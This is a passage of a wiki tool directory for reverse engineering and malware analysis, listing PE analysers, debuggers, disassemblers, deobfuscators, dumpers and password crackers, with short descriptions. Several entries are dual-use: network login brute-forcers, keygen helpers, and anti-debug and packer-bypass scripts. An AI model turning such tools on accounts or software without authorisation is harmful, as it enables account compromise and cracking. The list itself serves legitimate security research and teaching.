&lt;br /&gt;
*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Toolkit AIO====&lt;br /&gt;
=====Windows‑focused=====&lt;br /&gt;
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit &amp;quot;All-In-One&amp;quot;, Built for Security (Malware analysis, Penetration testing) &amp;amp; Educational purposes.&lt;br /&gt;
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.&lt;br /&gt;
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.&lt;br /&gt;
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.&lt;br /&gt;
&lt;br /&gt;
=====Android‑focused=====&lt;br /&gt;
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...&lt;br /&gt;
&lt;br /&gt;
====Binary PE Analysis / Editor (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers.  [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated &amp;quot;DIE&amp;quot; is a program for determining types of files. &amp;quot;DIE&amp;quot; is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.&lt;br /&gt;
&lt;br /&gt;
*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!&lt;br /&gt;
&lt;br /&gt;
*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).&lt;br /&gt;
&lt;br /&gt;
====Hex Editors====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.&lt;br /&gt;
&lt;br /&gt;
*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.&lt;br /&gt;
&lt;br /&gt;
*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.&lt;br /&gt;
&lt;br /&gt;
*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.&lt;br /&gt;
&lt;br /&gt;
====Pattern Matching / Pattern Searching====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.&lt;br /&gt;
&lt;br /&gt;
*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/stefankueng/grepWin grepWin] -  is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.&lt;br /&gt;
&lt;br /&gt;
*[https://astrogrep.sourceforge.net/  AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a &amp;quot;context&amp;quot; feature which is very nice for looking at source code.&lt;br /&gt;
&lt;br /&gt;
====Comparison Tools (Binary differences)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.&lt;br /&gt;
&lt;br /&gt;
*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).&lt;br /&gt;
&lt;br /&gt;
====IAT Reconstructors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.&lt;br /&gt;
&lt;br /&gt;
====Process Monitors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/winsiderss/systeminformer/ System Informer] - is a  free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.&lt;br /&gt;
&lt;br /&gt;
====Process Dumpers (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.&lt;br /&gt;
&lt;br /&gt;
====API monitoring ring3 (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.&lt;br /&gt;
&lt;br /&gt;
*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.&lt;br /&gt;
&lt;br /&gt;
====Hashing &amp;amp; Crypto====&lt;br /&gt;
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills.&amp;lt;br&amp;gt;&lt;br /&gt;
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.&lt;br /&gt;
&lt;br /&gt;
====Password cracking====&lt;br /&gt;
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.&lt;br /&gt;
&lt;br /&gt;
Offline&lt;br /&gt;
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.&lt;br /&gt;
&lt;br /&gt;
Online (network based bruteforce in LAN).&lt;br /&gt;
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.&lt;br /&gt;
&lt;br /&gt;
====Virtualization technology (host isolation) or sandboxes====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.&lt;br /&gt;
&lt;br /&gt;
*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production. &lt;br /&gt;
&lt;br /&gt;
*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local &amp;amp; mapped drives or the Windows registry.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. &amp;quot;If you implement boundaries and nobody is around to push them, do they even exist?&amp;quot;. Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?&lt;br /&gt;
&lt;br /&gt;
*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.&lt;br /&gt;
&lt;br /&gt;
*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.&lt;br /&gt;
&lt;br /&gt;
*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.&lt;br /&gt;
&lt;br /&gt;
*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.&lt;br /&gt;
&lt;br /&gt;
*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Dynamic &amp;amp; Static Analysis (mostly '''unmanged''' binaries)====&lt;br /&gt;
&lt;br /&gt;
=====Interactive Disassemblers ('''static analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.&lt;br /&gt;
&lt;br /&gt;
::Binary Ninja Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.&lt;br /&gt;
&lt;br /&gt;
*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].&lt;br /&gt;
&lt;br /&gt;
::Ghidra Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm &amp;amp; MIPS scripts] - ARM &amp;amp; MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.&lt;br /&gt;
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.&lt;br /&gt;
:::*Qt Framework&lt;br /&gt;
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled &amp;amp; compiled with MSVC.&lt;br /&gt;
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.&lt;br /&gt;
&lt;br /&gt;
::IDA Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).&lt;br /&gt;
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.&lt;br /&gt;
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.&lt;br /&gt;
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.&lt;br /&gt;
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.&lt;br /&gt;
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.&lt;br /&gt;
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.&lt;br /&gt;
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.&lt;br /&gt;
::::*Oreans CV scripts&lt;br /&gt;
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
::IDA LLM Plugins&lt;br /&gt;
:::*Local (quantized LLMs Q4/INT4)&lt;br /&gt;
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.&lt;br /&gt;
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.&lt;br /&gt;
:::*Cloud&lt;br /&gt;
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.&lt;br /&gt;
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.&lt;br /&gt;
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.&lt;br /&gt;
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.&lt;br /&gt;
&lt;br /&gt;
*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)&lt;br /&gt;
&lt;br /&gt;
*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.&lt;br /&gt;
&lt;br /&gt;
=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework.  Includes Disassembler, Debugger, Emulation and Symbolik analysis engines.  Includes built-in Server and Shared-Workspace functionality.  Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism).  Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA.  Criticisms (from a core dev): &amp;quot;Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better.  PR's and suggestions welcome.&amp;quot;  Best installed via Pip:  &amp;lt;code&amp;gt;python3 -m pip install vivisect&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)&lt;br /&gt;
&lt;br /&gt;
*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).&lt;br /&gt;
&lt;br /&gt;
*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.&lt;br /&gt;
&lt;br /&gt;
::OllyDbg Scripts/Plugins/Mods&lt;br /&gt;
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.&lt;br /&gt;
&lt;br /&gt;
*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.&lt;br /&gt;
&lt;br /&gt;
::x64dbg Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.&lt;br /&gt;
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for &amp;quot;all&amp;quot; versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.&lt;br /&gt;
&lt;br /&gt;
*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.&lt;br /&gt;
&lt;br /&gt;
::GDB Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.&lt;br /&gt;
&lt;br /&gt;
====Debugging and Profiling dynamic analysis (Linux)====&lt;br /&gt;
&lt;br /&gt;
*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.&lt;br /&gt;
&lt;br /&gt;
*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====.NET (CLR)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo &amp;amp; '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)]  - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.&lt;br /&gt;
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&amp;amp;more) - cross-platform!&lt;br /&gt;
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.&lt;br /&gt;
&lt;br /&gt;
======.NET deobfuscators======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.&lt;br /&gt;
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.&lt;br /&gt;
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.&lt;br /&gt;
&lt;br /&gt;
======.NET memory dumpers======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).&lt;br /&gt;
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).&lt;br /&gt;
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.&lt;br /&gt;
&lt;br /&gt;
======.NET tracers======&lt;br /&gt;
&lt;br /&gt;
::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com&lt;br /&gt;
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.&lt;br /&gt;
&lt;br /&gt;
=====JAVA (JVM) Decompilers=====&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.&lt;br /&gt;
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly &amp;amp; Ethereum Decompilers.&lt;br /&gt;
&lt;br /&gt;
======JAVA (ART/APK)======&lt;br /&gt;
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.&lt;br /&gt;
